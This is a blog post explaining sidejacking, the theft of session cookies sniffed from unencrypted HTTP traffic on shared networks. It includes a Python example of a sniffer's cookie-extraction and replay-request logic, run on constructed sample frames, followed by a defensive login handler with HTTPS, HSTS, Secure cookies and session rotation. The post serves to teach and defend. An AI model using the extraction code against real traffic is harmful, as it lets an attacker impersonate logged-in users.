A few days back we saw what Cryptojacking is and how hackers steal your CPU cycles without your knowledge. Attacks keep rising as internet penetration grows, and attackers count on finding someone who does not follow basic security practice. Let's look at another old trick used to steal information on an unsecured network: sidejacking.
What is sidejacking?
Sidejacking is a form of session hijacking in which the attacker steals a session cookie by reading network packets. Freely available packet sniffers (Firesheep and DroidSheep were built specifically for this) let an attacker capture traffic on a shared network; by reading the packets, the attacker extracts the session ID from the Cookie header and presents it to the same website. If you are logged in and your session ID is stolen, the attacker can impersonate you and use the application as if they were you, without ever needing your password.
Many websites use SSL/TLS (HTTPS) to encrypt the data between client and server, and in that case the attacker cannot read the cookie off the wire. However, some websites use HTTPS only for the login page or only for restricted areas of the site, and serve everything else over plain HTTP. The session cookie is then sent in clear text with every HTTP request after login, so an attacker who sidejacks you after your authentication is done can still access the website as if they were you. Note that nothing is "broken" here: the cookie simply leaks wherever the site falls back to HTTP.
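To make the attack concrete, here is an added example (not code from the original post, and not Firesheep or DroidSheep) of the core of a sidejacking sniffer: it walks an Ethernet/IPv4/TCP frame, checks whether the payload is a plaintext HTTP request, pulls the named cookie out of the Cookie header, and builds the request an attacker would replay. The frames, the host `webmail.example`, the cookie name `sessionid` and the cookie value are all constructed sample data; the TLS record is included to show that the same request over HTTPS yields nothing.

```python
import struct
from typing import Optional, Tuple

ETH_P_IP = 0x0800
IPPROTO_TCP = 6

# Constructed sample traffic (not a real capture). This is what a browser sends
# to a site that serves its pages over plain HTTP after login.
HTTP_REQUEST = (
    b"GET /inbox HTTP/1.1\r\n"
    b"Host: webmail.example\r\n"
    b"Cookie: theme=dark; sessionid=e3b0c44298fc1c149afbf4c8996fb924\r\n"
    b"\r\n"
)
# The same request over HTTPS is a TLS application-data record on the wire; the
# cookie sits inside the encrypted body (zero bytes stand in for ciphertext).
TLS_RECORD = b"\x17\x03\x03\x00\x20" + bytes(32)


def build_frame(payload: bytes, dst_port: int = 80) -> bytes:
    """Wrap payload in Ethernet/IPv4/TCP headers, as a sniffer would see it.
    Checksums are left as zero because the parser below does not verify them."""
    tcp = struct.pack("!HHIIBBHHH", 51234, dst_port, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0x1234, 0x4000, 64, IPPROTO_TCP, 0,
                     bytes([192, 168, 1, 10]), bytes([203, 0, 113, 5]))
    eth = b"\xaa" * 6 + b"\xbb" * 6 + struct.pack("!H", ETH_P_IP)
    return eth + ip + tcp + payload


def tcp_payload(frame: bytes) -> Optional[Tuple[str, int, bytes]]:
    """Walk Ethernet -> IPv4 -> TCP and return (dst_ip, dst_port, payload)."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
        return None
    ip = frame[14:]
    if ip[0] >> 4 != 4 or ip[9] != IPPROTO_TCP:
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    dst_ip = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    dst_port = struct.unpack("!H", tcp[2:4])[0]
    data_off = (tcp[12] >> 4) * 4
    return dst_ip, dst_port, tcp[data_off:]


def extract_session_cookie(frame: bytes, cookie_name: bytes) -> Optional[bytes]:
    """Return the value of cookie_name if the frame carries a plaintext HTTP
    request whose Cookie header contains it, otherwise None."""
    parsed = tcp_payload(frame)
    if parsed is None:
        return None
    _, _, payload = parsed
    # Plaintext HTTP starts with a method token; TLS starts with a record type byte.
    if not any(payload.startswith(m) for m in (b"GET ", b"POST ", b"HEAD ", b"PUT ")):
        return None
    head = payload.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() != b"cookie":
            continue
        for pair in value.split(b";"):
            k, _, v = pair.strip().partition(b"=")
            if k == cookie_name:
                return v
    return None


def forge_request(path: bytes, host: bytes, cookie_name: bytes, value: bytes) -> bytes:
    """The request the attacker replays: no password needed, just the cookie."""
    return (b"GET " + path + b" HTTP/1.1\r\nHost: " + host + b"\r\nCookie: "
            + cookie_name + b"=" + value + b"\r\n\r\n")


if __name__ == "__main__":
    sid = extract_session_cookie(build_frame(HTTP_REQUEST), b"sessionid")
    print("stolen session id:", sid)
    print("same request over HTTPS:", extract_session_cookie(build_frame(TLS_RECORD, 443), b"sessionid"))
    print(forge_request(b"/inbox", b"webmail.example", b"sessionid", sid).decode())
```

Real tools read frames from a wireless interface in monitor or promiscuous mode instead of `build_frame`, and reassemble TCP streams rather than looking at single segments, but the extraction step is exactly this: a string search through plaintext headers.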
How to avoid sidejacking?
Packet sniffing is easy when the attacker and the victim(s) are on the same network. This typically happens on open Wi-Fi networks, where traffic between your device and the access point is unencrypted, so anyone within radio range can capture it. Be careful when connecting to open Wi-Fi; it is best to avoid it. A VPN helps because it encrypts all traffic between your device and the VPN server, so the local network only sees an encrypted tunnel. Note that this is not end-to-end encryption: traffic leaves the VPN server in whatever form the website uses, so HTTPS still matters.
From the server side, development teams should serve the whole site over HTTPS (and send an HSTS header so browsers refuse to fall back to plain HTTP), mark the session cookie Secure so the browser never sends it over HTTP and HttpOnly so page scripts cannot read it, change the session ID after successful login, and use long random session IDs (at least 128 bits from a cryptographically secure generator) so they cannot be guessed.
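Putting those server-side measures together, here is an added example (not from the original post, and not tied to any particular web framework) of a login handler that refuses to authenticate over plain HTTP, rotates the session ID on login so a pre-login ID observed on the wire is worthless afterwards, and sets the cookie with the Secure and HttpOnly flags plus an HSTS header. The in-memory `SessionStore`, the cookie name `sessionid` and the redirect target `https://app.example/login` are assumptions for the example.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

COOKIE_NAME = "sessionid"  # assumed cookie name for the example


def new_session_id() -> str:
    """256 bits from the OS CSPRNG, URL-safe base64 (43 chars): not guessable."""
    return secrets.token_urlsafe(32)


@dataclass
class SessionStore:
    """Server-side session table keyed by session id (in-memory for the example)."""
    sessions: Dict[str, dict] = field(default_factory=dict)

    def create(self) -> str:
        sid = new_session_id()
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, old_sid: Optional[str], user: str) -> str:
        """Rotate the session id on successful authentication. The pre-login id
        is removed, so an id sniffed before login cannot ride into the logged-in
        session (this also blocks session fixation)."""
        data = self.sessions.pop(old_sid, None) if old_sid else None
        if data is None:
            data = {"user": None}
        data["user"] = user
        new_sid = new_session_id()
        self.sessions[new_sid] = data
        return new_sid

    def user_for(self, sid: str) -> Optional[str]:
        data = self.sessions.get(sid)
        return data["user"] if data else None


def session_cookie(sid: str) -> str:
    """Set-Cookie value: Secure stops the browser from ever sending the cookie
    over plain HTTP; HttpOnly keeps page scripts from reading it."""
    return f"{COOKIE_NAME}={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def security_headers() -> Dict[str, str]:
    """HSTS: a browser that has seen this header refuses plain HTTP for the host."""
    return {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"}


def handle_login(store: SessionStore, cookie_sid: Optional[str],
                 over_https: bool, user: str) -> Tuple[int, Dict[str, str], Optional[str]]:
    """Login handler after the password check has passed. Returns
    (status, response headers, new session id or None)."""
    if not over_https:
        # Never complete authentication over HTTP: the cookie would go out in clear.
        return 301, {"Location": "https://app.example/login"}, None
    sid = store.login(cookie_sid, user)
    headers = {"Set-Cookie": session_cookie(sid), **security_headers()}
    return 200, headers, sid


if __name__ == "__main__":
    store = SessionStore()
    pre_login = store.create()
    status, headers, sid = handle_login(store, pre_login, True, "alice")
    print(status, headers)
    print("old id still valid?", store.user_for(pre_login) is not None)
    print("new id maps to:", store.user_for(sid))
```

The rotation matters even on an all-HTTPS site: a session ID that was ever exposed before login (for example while the user browsed public pages over HTTP) must never become an authenticated session.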
Security, Hacking, Firesheep, Cryptojacking, VPN, SSL, DroidSheep